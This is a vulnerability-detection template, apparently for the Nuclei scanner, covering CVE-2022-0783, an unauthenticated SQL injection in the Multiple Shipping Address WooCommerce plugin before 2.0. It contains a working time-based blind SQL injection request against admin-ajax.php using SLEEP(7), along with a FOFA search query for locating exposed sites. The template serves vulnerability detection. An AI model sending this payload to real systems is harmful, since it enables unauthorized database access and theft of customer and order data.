The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
PoC代码[已公开]
id: CVE-2022-0783
info:
name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
impact: |
Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially exposing sensitive WooCommerce customer and order data.
remediation: |
Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
reference:
- https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0783
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.6
cve-id: CVE-2022-0783
cwe-id: CWE-89
epss-score: 0.51271
epss-percentile: 0.97789
cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: themehigh
product: multiple_shipping_addresses_for_woocommerce
fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)
matchers:
- type: dsl
dsl:
- "duration>=7"
- "len(body) == 5"
- "status_code==200"
- "regex('false$', body)"
condition: and
# digest: 4a0a00473045022100d32f9687ad1fa450ab01a4c2ff9089af489a8c322fb2532c0d7825c8b04336fa02202b1734294339c22e7d57510d67f290457779b5e86236e630154e339a248184c4:922c64590222798bb761d5b6d8e72950